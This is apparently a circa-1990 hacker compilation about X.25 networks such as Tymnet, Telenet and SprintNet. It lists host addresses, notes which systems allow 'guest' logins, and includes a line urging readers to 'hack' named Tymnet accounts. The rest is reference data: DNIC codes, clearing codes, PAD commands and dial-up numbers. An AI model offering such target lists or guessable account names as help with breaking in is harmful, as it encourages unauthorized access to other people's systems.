Database |023422351911198 |,DAADA | | Space Research|0234290524242| | | |
Brit. Oxig. |0234293212212| |,BOC | |
C E R N |022846811405 | | | |
B B D A |02062221006 | | | |
Dialne |0234212300120| | | |
Euclid LON |0234219200333| | | |
T S T B |023421920101030 | | |
U C L |0234219200300| | | |
|03106001977 | | | |
————————————————————
Software, South Africa………………………0655011101207
RUB Univ. of Bochum…………………………….026245234040194
ALTHH Altos Computer Systems Hamburg, West Germany…..026245400050233
ALTGER Altos Computer Systems Munich, West Germany……026245890040004
TCHH Teletex & Computer Hamburg, West Germany………026245400050570
OIS Markt & Technik Munich, West Germany………….026245890010006
RMI RMI Datentechnik Aachen, West Germany…………026245241090832

At all Systems, except RUB, u may login as “guest”.

—————————————-
302091600122 Primenet
302091600120 OD
302091600123
302091600127
311061700313
302067100901
302058700900 ^All above ODs
234212303101 Unix
26800401032811 Vax
302060100010 UCS
31104150002000 Dialog Info
208076020367 MCOM Int’l
208057040540 QSD
3110321001600 ???
31102020014275 ???

Try to hack these TymNet accounts:

monitor
operator
tape
telephone
outdial
paper
t.lloy03
come

Name NUA
—————————————–
RMT 26245441090832
2680040103281
03421920018
TCHH 26245400050570
262454890010006
222620021
20807602036797
UNIX system 26245241093062
UNIX system 23421330248
UNIX system 234212303101
UNIX SYSTEM 655012101361
Devel NET 311051300059
2740119910000
VAX SYSTEm 02222280173
VAX SYSTEM 0222 26500016
Portugal BBS system 268005229048
Telecom Gold 023421920100474
Washington Post 310600584401
Lutzifer 26245400080177
VSFLA 311090400158
Interet 311020100019
2222280173 login:guest
Lisbon University 26800401032811
[3020 60501245 Wallace & Carey Ltd System [Vax]
[3020] 80100062 PRIMENET 21.0.1 OTTAWA [Prime]
[3020] 62600146 University of Calgary [Cyber 630]
[3020] 64100016 TMPL-KAMLOOPS MV/2000 [AOS/VS
[3106] 004174 HOST [VM/SP]
[3106] 005034 : [HP-3000]
[3020] 62600057 SunOS [Unix]
[3020] 85801264 pad login:

These are Dialcom regional office phone numbers:

New York NY (212) 947-7995 Manager Virginia Marshalek
Houston/San Francisco (713) 690-6311
Chigaco (312) 694-2536
Washington DC (301) 770-4280

Their Telex (or as they call it XMAIL) service is pretty nifty. It offers both telelex and TWX links as well as hardcopy services via Mailgramme and cablegramme. Also each XMAIL user has a unique Telex address and not a common address with your user code having to be entered in the first line of the text. (Any one out there know of any other telex service which offers users an individual
unique telex number )

Here are some of ther NUA’s: DNIC is 3106
System 50 301 222
System 51 301 240
System 52 301 243
System 57 301 241
I believe however that they have simplified matters and that you can know use 301 3xx – where xx is the system number ( I have not tried this)
Also you can access them through any Telenet or Tymenet dial-up number in the USA. For Telenet when you get to the prompt type C and the system NUA e.g. ‘C 301 222’ for system 50. On Tymenet at the ‘PLEASE LOG IN: prompt you type in ‘DIALCOM;xx’ where xx is the system number.
For people in New York NY or Washington DC areas they also have their own dial in network.

COUNTRY NETWORK DNIC
——- ——- —-
ANDORA ANDORPAC 2945
ANTIGUA AGANET 3443
ARGENTINA ARPAC 7220
ARPAC 7222
AUSTRIA DATEX-P 2322
DATEX-P TTX 2323
RA 2329
AUSTRALIA AUSTPAC 5052
OTC DATA ACCESS 5053
AUSTPAC 5054
BAHAMAS BATELCO 3640
BAHRAIN BAHNET 4263
BARBADOS IDAS 3423
BELGIUM DCS 2062
DCS 2068
DCS 2069
BERMUDA BERMUDANET 3503
BRAZIL INTERDATA 7240
RENPAC 7241
RENPAC 7248
RENPAC 7249
CAMEROON CAMPAC 6242
CANADA DATAPAC 3020
GLOBEDAT 3025
INFOGRAM 3028
INFOSWITCH 3029
CAYMAN ISLANDS IDAS 3463
CHAD CHAD 6222
CHANNEL IS PSS 2342
CHILE ENTEL 7302
CHILE-PAC 7303
VTRNET 7305
ENTEL 7300
CHINA PTELCOM 4600
COLOMBIA COLDAPAQ 7322
COSTA RICA RACSAPAC 7120
RACSAPAC 7122
RACSAPAC 7128
RACSAPAC 7129
CURACAU UDTS 3400
CYPRUS CYTAPAC 2802
CYTAPAC 2807
CYTAPAC 2808
CYTAPAC 2809
DENMARK DATAPAK 2382
DATAPAK 2383
DJIBOUTI STIPAC 6382
DOMINICAN REP. UDTS-I 3701
EGYPT ARENTO 6020
FINLAND DATAPAK 2441
DATAPAK 2442
DIGIPAK 2443
FRANCE TRANSPAC 2080
NTI 2081
TRANSPAC 2089
TRANSPAC 9330
TRANSPAC 9331
TRANSPAC 9332
TRANSPAC 9333
TRANSPAC 9334
TRANSPAC 9335
TRANSPAC 9336
TRANSPAC 9337
TRANSPAC 9338
TRANSPAC 9339
FR ANTILLIES TRANSPAC 2080
FR GUIANA TRANSPAC 2080
DOMPAC 7420
FR POLYNESIA TOMPAC 5470
GABON GABONPAC 6282
GERMANY F.R. DATEX-P 2624
DATEX-C 2627
GREECE HELPAK 2022
HELLASPAC 2023
GREENLAND KANUPAX 2901
GUADELOUPE DOMPAC 3400
GUAM LSDS-RCA 5350
PACNET 5351
GUATEMALA GUATEL 7040
GUATEL 7043
HONDURAS HONDUTEL 7080
HONDUTEL 7082
HONDUTEL 7089
HONG KONG INTELPAK 4542
DATAPAK 4545
INET HK 4546
HUNGARY DATEX-P 2160
DATEX-P 2161
ICELAND ICEPAK 2740
INDIA GPSS 4042
INDONESIA SKDP 5101
IRELAND EIRPAC 2721
EIRPAC 2724
ISRAEL ISRANET 4251
ITALY DARDO 2222
ITAPAC 2227
IVORY COAST SYTRANPAC 6122
JAMAICA JAMINTEL 3380
JAPAN GLOBALNET 4400
DDX 4401
NIS-NET 4406
VENUS-P 4408
VENUS-P 9955
VENUS-C 4409
KOREA REP DACOM-NET 4501
DNS 4503
KUWAIT BAHNET 4263
LEBANON SODETEL 4155
LUXEMBOURG LUXPAC 2704
LUXPAC 2709
MACAU MACAUPAC 4550
MALAYSIA MAYPAC 5021
MARTININQUE DOMPAC 3400
MAURITIUS MAURIDATA 6170
MEXICO TELEPAC 3340
MOROCCO MOROCCO 6040
NETHERLANDS DATANET-1 2040
DATANET-1 2041
DABAS 2044
DATANET-1 2049
N. MARIANAS PACNET 5351
NEW CALEDONIA TOMPAC 5460
NEW ZEALAND PACNET 5301
NIGER NIGERPAC 6142
NORWAY DATAPAC TTX 2421
DATAPAK 2422
DATAPAC 2423
PANAMA INTELPAQ 7141
INTELPAQ 7142
PERU DICOTEL 7160
PHILIPPINES CAPWIRE 5150
CAPWIRE 5151
PGC 5152
GMCR 5154
ETPI 5156
PORTUGAL TELEPAC 2680
SABD 2682
PUERTO RICO UDTS 3300
UDTS 3301
QATAR DOHPAC 4271
REUNION (FR) TRANSPAC 2080
DOMPAC 6470
RWANDA RWANDA 6352
SAN MARINO X-NET 2922
SAUDI ARABIA ALWASEED 4201
SENEGAL SENPAC 6081
SINGAPORE TELEPAC 5252
TELEPAC 5258
ITELPAK 4542
SOUTH AFRICA SAPONET 6550
SAPONET 6551
SAPONET 6559
SOUTH KOREA DACOM-NET 4501
SPAIN TIDA 2141
IBERPAC 2145
SWEDEN DATAPAK TTX 2401
DATAPAK-1 2402
DATAPAK-2 2403
TELEPAK 2405
SWITZERLAND TELEPAC 2284
TELEPAC 2289
TAIWAN PACNET 4872
PACNET 4873
UDAS 4877
THAILAND THAIPAC 5200
IDAR 5201
TOGOLESE REP. TOGOPAC 6152
TORTOLA IDAS 3483
TRINIDAD DATANETT 3745
TEXTET 3740
TUNISIA RED25 6050
TURKEY TURPAC 2862
TURPAC 2863
TURKS&CAICOS IDAS 3763
U ARAB EMIRATES EMDAN 4241
EMDAN 4243
TEDAS 4310
URUGUAY URUPAC 7482
URUPAC 7489
USSR IASNET 2502
U.S. VIRGIN I UDTS 3320
U. KINGDOM IPSS-BTI 2341
PSS-BT 2342
MERCURY 2350
MERCURY 2351
HULL 2352
USA AUTONET 3126
COMPUSERVE 3132
FTCC 3124
ITT/UDTS 3103/310
MARKET 3136
RCA/LSDS 3113
TELENET 3110/312
TRT-DTAPAK 3119
TYMNET 3106
UNINET 3125
WUI-DBS 3104
WUTCO 3101
YUGOSLAVIA YUGOPAC 2201
ZIMBABWE ZIMNET 6482
——————————————————————
McDonell Douglas Information Systems Company
FOR IMMEDIATE RELEASE
89-191
ST.LOUIS, July 31, 1989 — McDonnell Douglas Corporation today announced that it will sell two of its information systems businesses and that it intends to convert its Information Systems International unit into a publuic company headquartered in the United Kingdom.
McDonnell Douglas has reached a prelimibnary agreement to sell its Network Systems Business which includes the Tymnet public data network, to British Telecom for $355 million. The acquisition is conditional on a full due diligence and regulatory clearances.
————————-
the commands at the ‘please log in:’ prompt are: (in summary)
^R – flow control the host (e.g. bix) with xon/xoff
^X – allow host to flow control you with xon/xoff
^H – set half duplex (turn local echo on)
^P – set even parity
– ignore the garbage I just typed and give me another ‘please log in:’

The host computer can and usually does reset/set these parameters depending on how the host interface is configured. After the ‘please log in:’ point the user cannot change these settings. If you entered a BS (^H) accidently causing double echoing and bix doesn’t reset it
then your only choice is to hangup and try it again.
The other terminal types are primarily for terminals that require line-feed/carriage return delay.

Terminal Identifiers
——————–
A ASCII 300baud and up CRT’s, PC’s
B ASCII 150baud All terminals
C ASCII 300baud Impact printers
D ASCII 100baud All terminals
E ASCII 300baud Thermal printers ( TI Silent 700)
F ASCII 150 in/300 out BETA terminals
G ASCII 300,1200 Belt printers, G.E. Terminet
I ASCII 1200baud Matrix printers
P EBCD/Correspondence 147.5baud Selectric-type terminals (2741)
————————–

DTE originated means that either the host that you were connected to or the local PAD cleared the call. The message usually tells you which by indicating either “local” or “remote” with the message.

cxx is the reason code for the clear, while dxx is the diagnostic code. If it is a dte originated clear then the reason code will always be the same. CCITT only allows DCEs (the Network) to generate meaningful reason codes.

The functions of an X.25 PAD(Packet Assembler/Disassembler) are to take the data from one protocol (async, SNA, Bisync, etc.) ond format it so that it can be placed onto an X.25 network.

The command interface used to configure a port on an Async PAD only by the user is called X.28. The parameters that you would be changing are called X.3 parameters. Before you can use the X.28 commands you need to know the escape character to enable you to talk to the PAD and not the destination. Not all ports have an escape character
enabled, for obvious reasons. Once you are talking to the PAD the two main commands that are used in X.28 is PAR and SET.

PAR is used to display the value of the 18-22 X.3 parameters, depending on whether your PAD is 1980 or 1984 compatible. SET is used to change the parameter value. This command is followed by the paramer number a
colon and then the new value.
————————–

TYMNET CLEARING CAUSE AND DIAGNOSTIC CODES
——————————————
Note: All Cause and diagnostic values are specified in decimal.

Cause Diagnostic Explanation
—– ———- —————————————–
00 — DTE originated;
Any Diagnostic is DTE provided.
01 — Number busy;
129 An ‘out of ports’ condition occurred.
03 — Invalid facility request;
65 Call set-up problem, facility code not allowed.
66 Call set-up problem, facility parameter not allowed.
05 — Network congestion;
20 Packet type invalid for state p1 [ready]
21 Packet type invalid for state p2 [STE-X call request]
22 Packet type invalid for state p3 [STE-Y call request]
23 Packet type invalid for state p4 [data transfer]
24 Packet type invalid for state p5 [call collision]
25 Packet type invalid for state p6 [STE-X clear request]
26 Packet type invalid for state p7 [STE-Y clear request]
33 Packet not allowed; unidentifiable packet
38 Packet not allowed; packet too short
39 Packet not allowed; packet too long
41 Logical channel non-zero in restart/restart confirm.
49 Timer expired for incoming call
50 Timer expired for clearing indication
51 Timer expired for reset indication
64 Call set-up problem (incorrect facility/utility field)
67 Call set-up problem, invalid called address
68 Call set-up problem, invalid calling address
128 Internal malfunction
129 The network supervisor sent ‘circuits busy’ message
130 The network supervisor sent ‘try again later’
131 The network supervisor sent ‘bad mud’
133 The network supervisor sent ‘no host specified’
134 The network supervisor sent ‘mud error’
135 Calling address does not match CHKCLG sysgen statement
138 Login error. TKSUP sysgen option not specified
139 The network supervisor sent ‘error, type username’
140 Received clear before getting normal circuit complete
141 Circuit timeout before sending call accept
142 Login timeout
143 INFOSWITCH login timeout
145 Utility length missing^L^L
05 — Network congestion (continued);
146 Non-CCITT protocol identifier
147 Call user data in call accept without fast select
148 Internal problem; illegal dialect message
150 The Q-bit was set on a non-data packet
151 Call user data field too long
152 Data lost in network
153 Login failure; node unable to complete request
154 Login failure; format error
155 Login failure; bad username
156 Login failure; bad mud
157 Login failure; system unavailable
158 Login failure; downline load or dial-out failure
159 Login failure; timeout
160 Login failure; access not permitted
161 Login failure; out of origination ports
162 Login failure; try ggain later
163-168 Login failure; unknown reason
169 Non-DSP call to DSP host
170 Invalid dialect level response
171 DSP call to non-DSP host
172 Buffer capacity exceeded
174 Error in received clear request packet
175 Invalid dialect message
176 Unimplemented dialect message
178 DNIC received in RPOA facility matches our DNIC
179 Unknown DNIC specified i RPOA facility
180 Illegal call accept dialect message
181 Illegal national utility/facility in call request
184 Duplicated utility/facility
185 Requested packet size not acceptable in negotiation
186 Requested packet window not acceptable in negotiation
188 Missing call identifier utility in call request
190 Call request received on an assigned logical channel
191 XOM shut
192 NNo available internal ports
09 — Out of order;
129 The network supervisor sent ‘host shut’ message
130 The network supervisor sent ‘host down’ message^L^L
11 — Access barred
129 The network supervisor sent ‘access not permitted’
130 The network supervisor sent ‘please see your rep.’
182 Outgoing calls barred within closed user group
183 Incoming calls barred within closed user group
13 — Not obtainable
129 The network supervisor sent ‘host not available’
130 The network supervisor sent ‘bad host’
17 — Remote procedure error;
17 Packet type invalid for state r1 [packet level ready]
18 Packet type invalid for state r2/r3 [STE-X/Y restart]
33 Packet not allowed; unidentifiable packet
41 Logical channel non-zero in restart/restart confirm.
52 Timer expired for restart indication
33 — Incompatible destination
40 Invalid GFI; D-bit not implemented
41 — Fast select acceptance not subscribed
65 Invalid facility request^L^L
————————–
[How does it all work?] Rather larger question. First, packets switchs are not identical. They have different internal implementations, different sets of external interfaces and different sets of external protocols. Their implementations of the external protocols may also vary. (Gives you a nice, warm feeling, doesn’t it.) In general,
packets networks receive (or generator) packets of data at the edge of the network which they then transport to the desired destination. The facilities (links between packet nodes) of the network are shared among all the users thus sharing the costs of the facilities. The two most popluar ways of getting data into a packets network are: async; and
X.25.

Async: Characters are received using start/stop delimiting. These characters are gathered into a packet and the packet is forwarded to the destination when it is full, certain character have been encountered or after a specified delay. This function is called a PAD (Packet ssembler/Disassembler) and is specified in the X.3 and X.29 standards of the CCITT. The packet network normally charges a premium to perform
the PAD function since it consumes CPU resources. Async lines support one connection.

X.25: X.25 is a synchronous protocol (ie. the interface must provide both the data and the clock for sampling the data at the appropriate time). Data is gathered into packets by the user and then transmitted to the packet network. X.25 provides a method of multiplexing multiple connections on one physical line (up to 4095, however, most packets networks only support a small subset). (I know, this is the condensed Reader’s Digest version, but a full explanation of X.25 would take too long for me to write.)

The hardware interface that you would see may depend on the speed of interface you require and the distance between you and the packet network. If you are not close to the node (say in the same building), the normal method of connection would be via modems. Some of the “standard” interfaces include RS232 (V.24), V.35 and RS449 (RS422/RS423). RS232 is only specified to 19200 bits/s and 50 feet.
Many people push RS232 well beyond its spec. (and have some problems with it. I wouldn’t go beyond 64K bps and only then with with VERY short cables, say 1-3 feet). The V.35 spec doesn’t go above 48K bps but with a proper cable I have run 300-500K bps. I have seen T1 (1.544M bps) on V.35, but, you need a well shielded, short cable. The RS-449 spec
contains a speed/length graph (which I don’t have at home). I beleive that it can be run up to 1M bps over a reasonable distance (say 50 feet).

For what you are doing (Unix BBS), you need to find a match between the external interfaces and protocols supported by your Unix box and the packet network. What kind of bandwidth are you looking for (per connection and over all)? What hardware interfaces does your box support? Does your box support X.25 or just async?

As an example, I have a Sun 3/60 at my desk with a 19.2K bps X.25 connection to a packet network. I run an X.29 PAD on the Sun. It can support a total of about 50-60 connections (a Unix socket limitation with BSD 4.03). The line has both incoming and outgoing call capabilities. On incoming calls, I can provide different actions based on the calling address, called address and protocol id bytes of the call. I can provide a Unix login prompt if I desire or I can drop the user directly into an application (eg. a BBS).

——————————————-
Info on acquiring and using a demo nui
and making one valid.
——————————————
200000 UN:USA.DEMO)
BELGIUM (C:BELGIUM,PUB:RTT,O:ASSOCIATES, 02062223344 UN:DEMO.X400)
CANADA (C:CANADA,PUB:TELECOM.CANADA, 0302089400900 O:TELECOM.SPE, ID:SALES.DEMO)
CHILE (C:CHILE,PUB:TOMMAIL,O:CORRESPONSALES, 0730520000450 UN:TELENET)
HONG KONG (C:HONGKONG, PUB:INET.HK, 0454610100500 O:TELENET.HONGKONG, UN:SALES.DEMO)
ITALY (C:ITALY,PUB:MASTER4OOT,O:TELEO, 022222600331 UN:BBERNSTEIN)
JAPAN (C:JAPAN,PUB:ATI,O:DEMO,UN:SALES.REPS) 0440020098810
MALAYSIA (C:MALAYSIA, PUB:STM.TELEMAIL, O:STM, 0502113205290 UN:SALES.DEMO)
MEXICO NOT AVAILABLE AT THIS TIME
NORWAY NOT AVAILABLE AT THIS TIME
SWEDEN (C:SWEDEN,PUB:TBXSPA,O:EXTERNAL, 02402001325 UN:SWEDEMAIL)
TAIWAN (C:ROC,PUB:PIPMAIL,O:PIP,UN:TELEMAIL) 0487220250
U.A.E. NOT AVAILABLE AT THIS TIME
UK (C:GB,PUB:TMAILUK,O:CCI,UN:TM.DEMO) 0234212300187
——————————————————–

DEMO PROCEDURES

Compose a message in your mailbox on the SprintMail USA system and in the “TO:” field of the envelope enter the appropriate “INT’L DEMO MAILBOX X.400 ADDRESS” listed above, including the parentheses. When complete, type “Y” at the “Send?” prompt. If desired, you can use the delivery receipt feature (DEL) to receive a confirmation-of-delivery
message back to your mailbox. An example of the “TO:” field of the envelope for a message sent to SprintMail Ltd. UK is shown below:

TO: (C:GB,PUB:TMAILUK,O:CCI,UN:TM.DEMO) (DEL)
Once you have typed “Y” followed by a carriage return, the message will be sent to the demo mailbox on the overseas messaging system via the international interconnection.

To retrieve the message and verify delivery for the customer, you will need to connect to the overseas messaging system via SprintNet and directly access the demo mailbox. To do this, first type “BYE” to disconnect from SprintMail. You will then receive the SprintNet ” prompt on your PC/terminal. After SprintNet gives an ” prompt you will need to enter your SprintNet NUI (ID/Password account).
Type “ID”, skip a space, and then enter your PDN ID code followed by a carriage return. Next the SprintNet will prompt you for “PASSWORD=”. Enter your password followed by a carriage return.

NOTE: IF YOU DO NOT ALREADY HAVE A U.S. SPRINT NUI FOR DEMO PURPOSES, PLEASE COMPLETE A U.S. SPRINT “USER ID ORDER FORM” AND MAIL IT TO:
Order Entry Department
U.S. Sprint Communication Corporation
12490 Sunrise Valley Drive
Reston, VA 22096
MAIL SLOT OP212B

The top of the form should be filled out as follows:
Customer Name = US Sprint
Master Agreement No. = (LEAVE BLANK)
Customer Number = (LEAVE BLANK)
Sales Office Log No. = (LEAVE BLANK)
Customer Admin. = Office Administrator
Admin. Phone No. = Office Phone Number

———————————————————–
Fill in the body of the form as necessary and put “For Internal US Sprint Use” in the comments section. The form must be signed by your branch manager for approval.
After you have correctly entered your NUI(ID/Password), the SprintNet will again prompt you with an “. At thispoint, type “C”, skip a space, and then enter the “OVERSEAS MESSAGING SYSTEM NETWORK ADDRESS” provided above followed by a carriage return. For example, to connect to the SprintMail messaging host in UK you would type the following at the SprintNet ” prompt:
C 0234212300187
Please note that all the international network X.121
addresses shown on the list above ALREADY have been
proceeded by a 0 (zero), which is the SprintNet terminal
handler for formatting the X.121 address.
SprintNet will respond with a “CONNECTED” notice,
after which you will receive the “User name?” prompt from
the overseas messaging system. Enter the appropriate user
name from the table above, followed by a carriage return. The name after “UN:” is the user name. In the case of the UK, the user name would be “TM.DEMO”. Next you will be prompted for “Password?”. Enter the correct demo mailbox password followed by a carriage return.
NOTE: TO OBTAIN THE APPROPRIATE PASSWORD FOR A DEMO MAILBOX, PLEASE SEND A REQUEST ON SPRINTMAIL TO SALES.SUPPORT. PASSWORDS WILL BE PROVIDED ONLY ON AN AS NEEDED BASIS. IN YOUR MESSAGE,PLEASE INDICATE THE NAME OF THE CUSTOMER THE DEMO IS FOR AND THE DESIRED DEMO DATE.
You are now using the demo mailbox on the overseas messaging system. The Scan table will show the message you previously sent from the SprintMail USA system. Use the READ command to show the customer the contents of the message and verify delivery.
If you wish to demo the service in the reverse direction, type “Compose” at the “Command?” prompt and address a message to your mailbox or the customer’s mailbox. In the “TO:” field of the envelope you must follow the X.400
addressing format, as follows:
TO: (C:USA,PUB:SPRINTMAIL,O:XXXXXXX,UN:YYYYYY)

where XXXXXXX is the Organization name
and YYYYYYY is the User name
At the “Command?” prompt type “BYE” followed by a carriage return to disconnect from the overseas messaging system.

———————————————————-

*[TYMNET]*
TYMNET ACCESS SORTED BY NODE NUMBER 10/17/1990

NODE CITY STATE DEN ACCESS NUMBER
—– —————– ————– —- ————-
00000 ANCHORAGE ALASKA INTL 907/258-7222
00000 # ANCHORAGE ALASKA INTL 907/258-6607
00000 BARROW ALASKA INTL 907/852-2425
00000 BETHEL ALASKA INTL 907/543-2411
00000 COLD BAY ALASKA INTL 907/532-2371
00000 CORDOVA ALASKA INTL 907/424-3744
00000 DEAD HORSE ALASKA INTL 907/659-2777
00000 DELTA JUNCTION ALASKA INTL 907/895-5070
00000 DILLINGHAM ALASKA INTL 907/842-2688
00000 FAIRBANKS ALASKA INTL 907/456-3282
00000 # FAIRBANKS ALASKA INTL 907/452-5848
00000 GLENNALLEN ALASKA INTL 907/822-5231
00000 HAINES ALASKA INTL 907/766-2171
00000 HOMER ALASKA INTL 907/235-5239
00000 ILIAMNA ALASKA INTL 907/571-1364
00000 JUNEAU ALASKA INTL 907/789-7009
00000 # JUNEAU ALASKA INTL 907/789-1976
00000 KENAI ALASKA INTL 907/262-1990
00000 KETCHIKAN ALASKA INTL 907/225-1871 00000 KING SALMON ALASKA INTL 907/246-3049
00000 KODIAK ALASKA INTL 907/486-4061
00000 KOTZEBUE ALASKA INTL 907/442-2602
00000 MCGRATH ALASKA INTL 907/524-3256
00000 MENANA ALASKA INTL 907/832-5214
00000 NOME ALASKA INTL 907/443-2256
00000 NORTHWAY ALASKA INTL 907/778-2301
00000 PALMER/WASILLA ALASKA INTL 907/745-0200
00000 PETERSBURG ALASKA INTL 907/772-3878
00000 PRUDHOE BAY ALASKA INTL 907/659-2777
00000 SEWARD ALASKA INTL 907/224-3126
00000 SITKA ALASKA INTL 907/747-5887
00000 SKAGWAY ALASKA INTL 907/983-2170
00000 SOLDOTNA/KENAI ALASKA INTL 907/262-1990
00000 ST. PAUL ALASKA INTL 907/546-2320
00000 TALKEETNA ALASKA INTL 907/733-2227
00000 TANANA ALASKA INTL 907/366-7167
00000 TOK ALASKA INTL 907/883-4747
00000 VALDEZ ALASKA INTL 907/835-4987
00000 WASILLA ALASKA INTL 907/745-0200
00000 WHITTIER ALASKA INTL 907/472-2467 00000 WRANGELL ALASKA INTL 907/874-2394
00000 YAKUTAT ALASKA INTL 907/784-3453
02026 # MARSHALLTOWN IOWA LOW 515/753-0670
02035 #ALEXANDRIA/FAIRFAX VIRGINIA HIGH 703/352-3136
02035 # ARLINGTON/FAIRFAX VIRGINIA HIGH 703/352-3136
02035 # BETHESDA MARYLAND HIGH 703/352-3136
02035 # FAIRFAX VIRGINIA HIGH 703/352-3136
02035 # WASHINGTON D.C. HIGH 703/352-3136
02045 # ALBANY NEW YORK MED 518/458-9724
02045 #SCHENECTADY/ALBANY NEW YORK MED 518/458-9724
02050 # CASPER WYOMING LOW 307/234-4211
02057 # SEVIERVILLE TENNESSEE LOW 615/453-0401
02066 INDIANAPOLIS INDIANA HIGH 317/631-1002
02071 # LAS CRUCES NEW MEXICO LOW 505/525-3401
02074 # INDIANAPOLIS INDIANA HIGH 317/632-6408
02124 # YAKIMA WASHINGTON LOW 509/248-1462
02145 + NORRISTOWN PENNSYLVANIA HIGH 215/668-1984
02155 # BLOOMINGTON INDIANA LOW 812/332-0544
02163 # CHEYENNE WYOMING LOW 307/638-0403
02244 # DOWNRS GROV ILLINOIS MED 708/790-4955
02244 # GLEN ELLYN ILLINOIS MED 708/790-4955
02244 # WHEATON/GLN ELLYN ILLINOIS MED 708/790-4955
02246 BIRMINGHAM ALABAMA HIGH 205/942-4141
02252 # VINELAND NEW JERSEY LOW 609/691-6446 02256 ELGIN ILLINOIS LOW 708/888-8113
02263 # LAWTON OKLAHOMA LOW 405/353-6987
02265 # ALBUQUERQUE NEW MEXICO MED 505/242-8931
02301 # EAU CLAIRE WISCONSIN LOW 715/833-0121
02304 NEW YORK NEW YORK HIGH 212/269-4640
02323 # ST. CLOUD MINNESOTA LOW 612/251-4942
02326 # ORMOND BEACH FLORIDA LOW 904/673-0034
02346 # NORRISTOWN PENNSYLVANIA WATS 800/###-####
02354 BALTIMORE MARYLAND HIGH 301/547-8100
02357 BLOOMFIELD CONNECTICUT HIGH 203/242-7140
02357 HARTFORD/BLMFIELD CONNECTICUT HIGH 203/242-7140
02364 MESA/PHOENIX ARIZONA HIGH 602/254-5811
02364 PHOENIX ARIZONA HIGH 602/254-5811
02367 # CHAMPAIGN/URBANA ILLINOIS LOW 217/344-3400 02367 # URBANA ILLINOIS LOW 217/344-3400
02376 # LIMA OHIO LOW 419/228-6343
02377 MINNEAPOLIS MINNESOTA HIGH 612/338-0845
02377 ST. PAUL/MINN MINNESOTA HIGH 612/338-0845
02402 # HATTIESBURG MISSISSIPPI LOW 601/582-0286 02414 AURORA/DENVER COLORADO HIGH 303/830-9210
02414 BOULDER/DENVER COLORADO HIGH 303/830-9210
02414 DENVER COLORADO HIGH 303/830-9210
02425 # MESA/PHOENIX ARIZONA HIGH 602/258-0554
02425 # PHOENIX ARIZONA HIGH 602/258-0554
02432 # CHATTANOOGA TENNESSEE MED 615/265-1020 02435 # WILLIAMSBURG VIRGINIA LOW 804/229-6786
02440 BROOKFIELD WISCONSIN HIGH 414/785-1614
02440 MIL/BROOKFIELD WISCONSIN HIGH 414/785-1614
02443 # BURBANK CALIFORNIA LOW 818/841-4795
02443 # GLENDALE/BURBANK CALIFORNIA LOW 818/841-4795
02446 # TEXARKANA TEXAS LOW 214/792-4521
02450 #KING-PRUSA/NORSTWN PENNSYLVANIA MED 215/666-9190 02450 # NORRISTOWN PENNSYLVANIA MED 215/666-9190 02450 # VLY FORGE/NORSTWN PENNSYLVANIA MED 215/666-9190
02453 DALLAS TEXAS HIGH 214/638-8888
02465 DWNRS GRV/GLN ELN ILLINOIS MED 708/790-4400
02465 GLEN ELLYN ILLINOIS MED 708/790-4400
02465 WHTON/GLEN ELLYN ILLINOIS MED 708/790-4400
02502 # LAWRENCE MASSACHUSETTS LOW 508/683-2680
02503 BELLEVUE/SEATTLE WASHINGTON HIGH 206/285-0109
02503 SEATTLE WASHINGTON HIGH 206/285-0109
02521 + JACKSONVILLE FLORIDA MED 904/724-5994
02544 ALXANDRIA/FAIRFAX VIRGINIA HIGH 703/691-8200
02544 ARLINGTON/FAIRFAX VIRGINIA HIGH 703/691-8200
02544 BETHESDA MARYLAND HIGH 703/691-8200
02544 FAIRFAX VIRGINIA HIGH 703/691-8200
02544 WASHINGTON D.C. HIGH 703/691-8200
02545 ALXANDRIA/FAIRFAX VIRGINIA HIGH 703/691-8200
02545 ARLINGTON/FAIRFAX VIRGINIA HIGH 703/691-8200
02545 BETHESDA MARYLAND HIGH 703/691-8200
02545 FAIRFAX VIRGINIA HIGH 703/691-8200
02545 WASHINGTON D.C. HIGH 703/691-8200
02555 # MYRTLE BEACH SOUTH CAROLINA LOW 803/448-5401
02557 # TYLER TEXAS LOW 214/581-8652
02564 # RICHLAND WASHINGTON MED 509/375-3367
02565 BOISE IDAHO MED 208/343-0404
02566 # PIERRE SOUTH DAKOTA LOW 605/224-7700
02570 DAYTON OHIO MED 513/898-0124
02606 ELIZABETH/NEWARK NEW JERSEY HIGH 201/824-1212
02606 JERSEY CITY/NWK NEW JERSEY HIGH 201/824-1212
02606 NEWARK NEW JERSEY HIGH 201/824-1212
02606 UNION/NEWARK NEW JERSEY HIGH 201/824-1212
02613 CHAPEL HILL/DURHAM NORTH CAROLINA MED 919/549-8952
02613 DURHAM NORTH CAROLINA MED 919/549-8952
02614 # LANCASTER CALIFORNIA LOW 805/945-4962
02616 # MANCHESTER MASSACHUSETTS LOW 508/526-1506
02630 # SHERMAN TEXAS LOW 214/868-0089 0631 NEWPRT BEACH CALIFORNIA HIGH 714/756-8341
02631 IRVINE/NEWPORT CALIFORNIA HIGH 714/756-8341
02631 NEWPORT BEACH CALIFORNIA HIGH 714/756-8341
02631 SANTA ANA/NEWPRT CALIFORNIA HIGH 714/756-8341
02640 # PETERBOROUGH NEW HAMPSHIRE LOW 603/924-7090 02644 ANAHEIM/NEWPRT CALIFORNIA HIGH 714/752-1493
02644 IRVINE/NEWPORT CALIFORNIA HIGH 714/752-1493
02644 NEWPORT BEACH CALIFORNIA HIGH 714/752-1493
02644 SANTA ANA/NEWPRT CALIFORNIA HIGH 714/752-1493
02653 STAMFORD CONNECTICUT HIGH 203/965-0000
02655 COLTON/RIVERSIDE CALIFORNIA MED 714/370-1200
02655 RIVERSIDE CALIFORNIA MED 714/370-1200
02655 SAN BERN/RIVRSD CALIFORNIA MED 714/370-1200
02665 # SAN DIEGO CALIFORNIA HIGH 619/296-8747
02666 # JACKSON MICHIGAN LOW 517/788-9191
02674 # TUPELO MISSISSIPPI LOW 601/841-0090
02703 # BELLEVUE/SEATTLE WASHINGTON HIGH 206/281-7141
02703 # SEATTLE WASHINGTON HIGH 206/281-7141
02704 # SAN FRANCISCO CALIFORNIA WATS 800/###-####
02706 # MIDLAND TEXAS LOW 915/683-5645 02706 # ODESSA/MIDLAND TEXAS LOW 915/683-5645
02711 # KINGSPORT TENNESSEE LOW 615/378-5746 02720 # LA CROSSE WISCONSIN LOW 608/784-9099
02723 BATON ROUGE LOUISIANA MED 504/924-5102
02735 # SAN ANTONIO TEXAS HIGH 512/222-9877 02737 SALT LAKE UTAH HIGH 801/364-0780
02744 # ELIZABETH/NEWARK NEW JERSEY HIGH 201/824-3044
02744 # JERSEY CITY/NWK NEW JERSEY HIGH 201/824-3044
